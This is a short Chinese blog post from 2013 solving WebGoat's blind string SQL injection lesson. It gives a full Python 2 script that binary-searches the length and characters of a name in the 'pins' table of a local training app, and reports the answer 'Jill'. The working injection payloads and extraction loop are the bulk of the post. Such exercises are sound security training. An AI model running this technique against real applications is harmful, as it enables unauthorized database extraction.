webgoat 中 Blind String SQL Injection 的 Python 編程解決

這個 task 如果用手工嘗試的話, 還是比較麻煩的. 決定用編程解決.

Python處理任務相關的問題比較方便, 花時間入門了下 python, 然後開始寫代碼, 很簡單的原理. 

在這期間發現簡單的演算法都不熟了, 汗.

以下是代碼

#!/usr/bin/python#author: dengzhaoqun#date: 2013-03-08#email: dengzhaoqun@163.comimport urllibimport urllib2import sysurl= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'account = 101result = '<p>Account number is valid</form></div>'def isValid(str):    params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})    req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})    f = urllib2.urlopen(req)    content = f.read()    ret = content.find(result)    if(ret == -1):        return False    return True#get name lenlenMax = 100lenMin = 1while(lenMax > lenMin):    #print lenMax, lenMin    len = (lenMax + lenMin) / 2    str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)    #print str    valid = isValid(str)    if( not valid):        lenMin = len + 1    else:        lenMax = lenprint "--- name len: %d ---" %lenMax        # get namename = ''for i in range(1, lenMax + 1):    charMax = 122  # 'z'    charMin = 65 # 'A'    while(charMax > charMin):        #print chr(charMax), chr(charMin)        char = (charMax + charMin) / 2        str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))        #print str        valid = isValid(str)        if( not valid):            charMin = char + 1        else:            charMax = char    name += chr(charMax)print '--- name: %s ---' % name

運行結果如下

--- name len: 4 ------ name: Jill ---

"Jill" 即是所求的 name .